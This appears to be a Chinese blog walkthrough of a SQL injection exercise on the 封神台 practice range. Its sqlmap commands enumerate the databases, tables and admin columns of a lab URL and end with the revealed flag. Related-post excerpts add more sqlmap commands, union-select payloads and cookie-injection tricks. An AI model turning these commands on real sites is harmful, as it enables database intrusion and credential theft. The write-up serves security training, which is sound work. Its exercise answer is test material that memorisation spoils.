【封神台】SQL注入靶场练习(sqlmap)

最新推荐文章于 2025-10-13 15:46:17 发布
原创 最新推荐文章于 2025-10-13 15:46:17 发布 · 1.2w 阅读 · 19 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #数据库 #database

本文详细介绍了一个具体的SQL注入案例,从发现可注入参数开始,逐步演示如何利用sqlmap工具进行数据库查询,最终成功获取管理员密码的过程。

靶场地址

https://hack.zkaq.cn

题目

在这里插入图片描述

解题过程

1.进入题目
在这里插入图片描述
2.只有个 点击查看新闻,点击进入
在这里插入图片描述
3.发现参数id,肯定就是我们要注入的参数了,先用sqlmap跑一遍

查询数据库
python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --dbs
在这里插入图片描述
因为我们需要获得管理员密码,所以要查maoshe数据库
python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --tables -D maoshe
在这里插入图片描述
查admin表
python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --columns -T admin -D maoshe
在这里插入图片描述
查password
在这里插入图片描述
输入flag :hellohack ,正确
在这里插入图片描述

SQL注入--靶场练习
wmr123456001的博客
02-11 2329
SQL注入靶场练习
sqlmap实战,攻击学校学院网站(靶机)
Marsper的博客
09-10 2019
sqlmap实战,获取学院网站(靶机)管理员密码 首先获取学院网址,寻找注入点,利用上节学到的sqlmap使用方法 然后直接放进sqlmap里运行,输入sqlmap.py -u http://117.167.136.244:28004/index/narticle.php?nid=3027 如下图 接着找出所有数据库,输入sqlmap.py -u http://117.167.136.244:28004/index/narticle.php?nid=3027 --dbs 运行结果如下 接着选择rjxy数
常见的Sql注入利用及sqlmap的简单使用(均在靶场内实现)
最新发布
2302_81234358的博客
10-13 1007
本文系统梳理了SQL注入技术,包括以下核心内容:1. 注入基础知识:URL编码规则(%23代替#、%20代替空格等)、进制标识方法;2. 常见注入点:URL参数、表单输入、Cookie、HTTP头部字段等;3. 主要注入方法:联合查询(union)、布尔盲注(length/substr/ascii)、时间盲注(if/sleep)、报错注入(updatexml/extractvalue)、宽字节注入、DNSLOG注入;4. 完整注入流程:判断注入点→闭合方式→字段数→回显位→获取库/表/列信息→提取数据;5.
封神台靶场 绕过防护getshell
devil8123665的博客
09-24 4554
封神台 https://hack.zkaq.cn/battle 靶场 http://59.63.200.79:8003/bees/ 一 爬取方法 1 针对本题目而言,是很简单的,只需要暴出站点的目录就能在根目录下找到flag.txt 御剑扫描:需要在御剑的字典中添加flag.txt等相关关键字 访问链接即可获得flag值。 2 或者使用其他的爬虫或者是扫描工具只要能获的站点目录,就能找到flag.txt 二 注入方法 1 通过kali dirb 暴出目录,找到http://59.6.
sql注入靶场练习
weixin_46976845的博客
03-19 6288
pass.1 发现id注入点,尝试联合注入 id=1’ union select 1,database().3 --+或者 id=1’ union select 1,database().3#’ 返回 Welcome Dhakkan Your Login name:Dumb Your Password:Dumb 跑sqlmap 得知数据库账户密码都为root pass.2 注入与1相同 pass.3 括号闭合 注意 ?id=1’) union select 1,database().3 --+ pa
BP靶场SQL注入练习
剁椒鱼头没剁椒的博客
01-14 2497
Bp靶场有点类似于常见的DVWA靶场、piachu靶场,里面富含多种不同类型的漏洞,并且每个靶场都有针对性,例如sql注入,从最简单的判断开始,逐步的增加难度,并且每一个靶场都附带介绍以及通过方式,能够让新人快速的了解原理并且针对性练习
sqlmap的使用 (以封神台题目为例)
yangtailang94666的博客
10-11 1523
一、sqlmap选项 目标:至少要选中一个参数 -u URL, --url=URL 目标为 URL (例如. "http://www.site.com/vuln.php?id=1") -g GOOGLEDORK 将谷歌dork的结果作为目标url 请求: 这些选项可用于指定如何连接到目标URL --data=DATA 数据字符串通过POST发送 --cookie=COOKIE HTTP Cookie的值 ...
sqlmap手机版渗透封神台靶场教程
2402_86169469的博客
09-01 394
batch 自动选择yes -D 选择那个数据库 -tables 列出表的表。-dump获取数据中的字段。出现图中勾画的这些就证明成功了。让后在打开admin这个库。打开名为maoshe的库。密码为hellohack。-u 指定目标URL。-dbs 所有数据库
封神台 kali sqlmap 注入常见问题
weixin_49071539的博客
11-25 1510
sqlmap使用前,测试网页是否存在可注入漏洞: 1.寻找形如“.asp?id=xx”类的带参数的URL。 2.去掉“id=xx”查看页面显示是否正常,如果不正常,说明参数在数据传递中是直接起作用的。 3.清空浏览器地址栏,输入“javascript:alert(document.cookie=“id=”+escape(“xx”));”,按Enter键后弹出一个对话框,内容是“id=xx”,然后用原来的URL刷新页面,如果显示正常,说明应用是用Request(“id”)这种方式获取数据的。 4.重复上面的步
封神台-掌控者新靶场 - Kali系列4题
热门推荐
weixin_43821278的博客
03-11 1万+
靶场 - Kali系列【4题】 Kali渗透 - Sqlmap实操靶场
封神台靶场-第二章
Mr_helloword的博客
07-12 3307
第二章:遇到阻难!绕过WAF过滤 1.查找有无sql注入点利用and 1=1发现做了过滤 使用order by 查字段数发现order by 没有被过滤,最后当字段为10时显示正常字段为10 2.因为网页做了waf过略防护,这里我们考虑用cookie注入,可以进行绕过: 这里我们使用一个小工具进行注入(火狐插件) 这款工具可以自定义请求头响应头(Request header,Reponse header) 打开这款插件直接在value处填写注入参数即可然后按上面的键开始(value中的值需要注意的是空
sqlmap在windows上执行sql注入,利用dvwa靶场.md
05-19
分享一下自己学习sqlmap的过程,因为网上的资源很少,所以就想着写个博客记录一下,同时也分享一下吧。就先讲到这里吧,有问题的可以私信。欢迎大家提意见。
sql server靶场练习
weixin_68536270的博客
07-03 339
sql server靶场练习
sqlmap练习
0xcc'Blog
04-08 573
使用DVWA作为靶场 对此直接进行爆破效果不太理想 可以对此进行抓包,把cookie抓下来 再进行爆破 获取数据库 获取表 猜字段 获取数据 由此就获取了管理员的账户,完成了一次渗透 ...
sql注入靶场实操
m0_46104808的博客
10-27 1770
sql注入漏洞利用
web安全之通过sqlmap工具进行靶场练习
记录学习,一起进步
12-07 1283
web安全之通过sqlmap工具对靶场进行练习
封神台——新靶场kali系列——kali渗透-Sqlmap实操靶场
weixin_63841886的博客
11-30 1708
封神台在线演练靶场中,新靶场kali渗透-sqlmap实操靶场
sql_labs靶场练习
nidaxin的博客
11-05 743
符号含义:(1)?:作用为注释一个变量 (2)--+:+在这里相当于空格;整个是注释 判断字段数:?id=x'(可变) union select 1,2,3 --+ [1,2,3表示第几个字段] 判断字段数:?id=0' order by x --+ [其中可以先给x从小到大赋值,直到报错,就可知道字段数了] 判断注入点:?id=1 and 1=2 闭合注入点:?id=1 'and 1=2 --+ ?id=1 'and 1=1 --+ 查询数据库:?id=0' ...
SQL注入实验靶场(附环境)
m0_74025111的博客
11-05 1256
​ 扫出了一个库,证明信息就在这个库里面,得知信息在此库里面就好办了,直接爆表和字段信息sqlmap -u http://192.168.171.131/cat.php?​ 是一个登录页面,我们不知道密码,那我们就通过数据库来进行获取信息,在前面的源码中发现存在id参数注入,测试一下该靶场是否存在sql注入。页面没有什么可用的资源,查看源码,从源码可以发现是存在id参数注入,文件上传。进入到上传目录,发现了这个页面存在图片和信息类的,还有相关的路径。通过路径还可以发现有admin目录的,直接访问一手。
sql注入靶场sqlmap
12-27
对于想要构建自己的SQL注入练习平台的人来说,`sqli-labs`是一个不错的选择。这个项目包含了多个不同难度级别的挑战案例,可以帮助使用者逐步掌握SQL注入的技术要点。安装`sqli-labs`通常只需要下载源码并配置好相应...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值